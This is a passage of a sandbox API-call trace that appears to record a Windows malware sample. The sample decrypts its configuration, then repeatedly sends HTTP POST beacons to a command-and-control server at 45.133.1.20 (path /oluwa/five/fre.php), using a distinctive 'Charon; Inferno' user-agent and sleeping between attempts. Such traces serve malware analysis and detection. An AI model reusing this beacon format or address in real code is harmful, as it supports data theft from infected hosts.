phProv=0x19fca8*=0x6bf058) returned 1 [0198.050] GetProcessHeap () returned 0x6a0000 [0198.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0198.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.054] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.056] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.057] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.057] GetProcessHeap () returned 0x6a0000 [0198.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0198.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.059] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0198.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.061] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.072] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0198.072] GetProcessHeap () returned 0x6a0000 [0198.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.077] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.079] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.080] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.080] GetProcessHeap () returned 0x6a0000 [0198.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0198.080] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.080] GetProcessHeap () returned 0x6a0000 [0198.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0198.081] GetProcessHeap () returned 0x6a0000 [0198.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.081] GetProcessHeap () returned 0x6a0000 [0198.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0198.082] GetProcessHeap () returned 0x6a0000 [0198.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0198.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.083] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.090] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0198.119] GetProcessHeap () returned 0x6a0000 [0198.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.120] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.121] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.123] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.123] GetProcessHeap () returned 0x6a0000 [0198.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.128] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0198.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.129] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.130] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0198.130] GetProcessHeap () returned 0x6a0000 [0198.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.131] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0198.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.133] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0198.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.134] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0198.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.139] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0198.139] GetProcessHeap () returned 0x6a0000 [0198.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0198.139] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0198.139] GetProcessHeap () returned 0x6a0000 [0198.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0198.139] socket (af=2, type=1, protocol=6) returned 0x508 [0198.140] connect (s=0x508, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0198.173] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0198.173] GetProcessHeap () returned 0x6a0000 [0198.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0198.174] GetProcessHeap () returned 0x6a0000 [0198.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0198.174] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.175] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.176] GetProcessHeap () returned 0x6a0000 [0198.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0198.176] GetProcessHeap () returned 0x6a0000 [0198.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0198.176] GetProcessHeap () returned 0x6a0000 [0198.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0198.176] GetProcessHeap () returned 0x6a0000 [0198.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0198.177] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.178] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.178] GetProcessHeap () returned 0x6a0000 [0198.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0198.178] GetProcessHeap () returned 0x6a0000 [0198.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0198.179] send (s=0x508, buf=0x6b5c98*, len=242, flags=0) returned 242 [0198.180] send (s=0x508, buf=0x6bb998*, len=159, flags=0) returned 159 [0198.180] GetProcessHeap () returned 0x6a0000 [0198.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0198.180] recv (in: s=0x508, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0198.249] GetProcessHeap () returned 0x6a0000 [0198.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0198.251] GetProcessHeap () returned 0x6a0000 [0198.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0198.251] GetProcessHeap () returned 0x6a0000 [0198.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0198.251] GetProcessHeap () returned 0x6a0000 [0198.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0198.252] closesocket (s=0x508) returned 0 [0198.253] GetProcessHeap () returned 0x6a0000 [0198.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0198.253] GetProcessHeap () returned 0x6a0000 [0198.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.254] GetProcessHeap () returned 0x6a0000 [0198.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0198.254] GetProcessHeap () returned 0x6a0000 [0198.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0198.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc04) returned 0x508 [0198.267] Sleep (dwMilliseconds=0xea60) [0198.269] GetProcessHeap () returned 0x6a0000 [0198.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0198.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.271] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0198.290] GetProcessHeap () returned 0x6a0000 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.297] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.298] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.299] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.299] GetProcessHeap () returned 0x6a0000 [0198.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.301] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0198.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.302] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.303] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0198.303] GetProcessHeap () returned 0x6a0000 [0198.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.305] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.306] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.307] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.309] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.309] GetProcessHeap () returned 0x6a0000 [0198.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0198.309] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.309] GetProcessHeap () returned 0x6a0000 [0198.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0198.310] GetProcessHeap () returned 0x6a0000 [0198.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.310] GetProcessHeap () returned 0x6a0000 [0198.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0198.311] GetProcessHeap () returned 0x6a0000 [0198.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0198.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0198.330] GetProcessHeap () returned 0x6a0000 [0198.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.333] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0198.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.334] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.335] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.336] GetProcessHeap () returned 0x6a0000 [0198.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.338] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0198.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.339] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0198.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.341] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0198.341] GetProcessHeap () returned 0x6a0000 [0198.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.342] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0198.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.343] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0198.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.344] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0198.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.346] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0198.346] GetProcessHeap () returned 0x6a0000 [0198.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0198.346] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0198.346] GetProcessHeap () returned 0x6a0000 [0198.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0198.346] socket (af=2, type=1, protocol=6) returned 0x50c [0198.347] connect (s=0x50c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0198.373] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0198.373] GetProcessHeap () returned 0x6a0000 [0198.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0198.373] GetProcessHeap () returned 0x6a0000 [0198.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0198.374] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.375] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.375] GetProcessHeap () returned 0x6a0000 [0198.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0198.376] GetProcessHeap () returned 0x6a0000 [0198.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.376] GetProcessHeap () returned 0x6a0000 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0198.376] GetProcessHeap () returned 0x6a0000 [0198.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0198.377] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.378] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.378] GetProcessHeap () returned 0x6a0000 [0198.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0198.378] GetProcessHeap () returned 0x6a0000 [0198.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.379] send (s=0x50c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0198.380] send (s=0x50c, buf=0x6bb998*, len=159, flags=0) returned 159 [0198.380] GetProcessHeap () returned 0x6a0000 [0198.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0198.380] recv (in: s=0x50c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0198.451] GetProcessHeap () returned 0x6a0000 [0198.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0198.452] GetProcessHeap () returned 0x6a0000 [0198.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0198.452] GetProcessHeap () returned 0x6a0000 [0198.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0198.453] GetProcessHeap () returned 0x6a0000 [0198.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0198.453] closesocket (s=0x50c) returned 0 [0198.454] GetProcessHeap () returned 0x6a0000 [0198.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0198.454] GetProcessHeap () returned 0x6a0000 [0198.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.454] GetProcessHeap () returned 0x6a0000 [0198.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0198.455] GetProcessHeap () returned 0x6a0000 [0198.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0198.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13bc) returned 0x50c [0198.458] Sleep (dwMilliseconds=0xea60) [0198.460] GetProcessHeap () returned 0x6a0000 [0198.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0198.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0198.481] GetProcessHeap () returned 0x6a0000 [0198.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5b38 [0198.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.482] CryptImportKey (in: hProv=0x6bf168, pbData=0x6c5b38, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0198.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.483] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.484] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.485] GetProcessHeap () returned 0x6a0000 [0198.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 